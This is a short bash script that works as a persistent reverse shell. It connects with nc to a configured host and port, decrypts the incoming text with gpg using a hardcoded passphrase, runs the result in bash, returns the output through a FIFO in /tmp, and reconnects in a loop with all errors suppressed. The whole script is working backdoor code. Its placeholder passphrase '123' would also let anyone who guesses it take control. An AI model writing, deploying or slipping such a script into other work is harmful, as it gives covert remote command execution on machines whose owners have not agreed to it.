#!/usr/bin/env bash

pass="123" # This should be unique for every client-server pair/channel
host="0.0.0.0"
port="56622"

gpg_filter(){
    gpg --batch --quiet --armor --output - --passphrase "${pass}" --allow-multiple-messages --decrypt -
} 2>/dev/null

pipe="/tmp/pipe"; mkfifo "${pipe}" 2>/dev/null

# Loop makes sure connection is resumed if closed
while :;do
  nc "${host}" "${port}" < "${pipe}" 2>/dev/null | gpg_filter | bash &> "${pipe}"
done
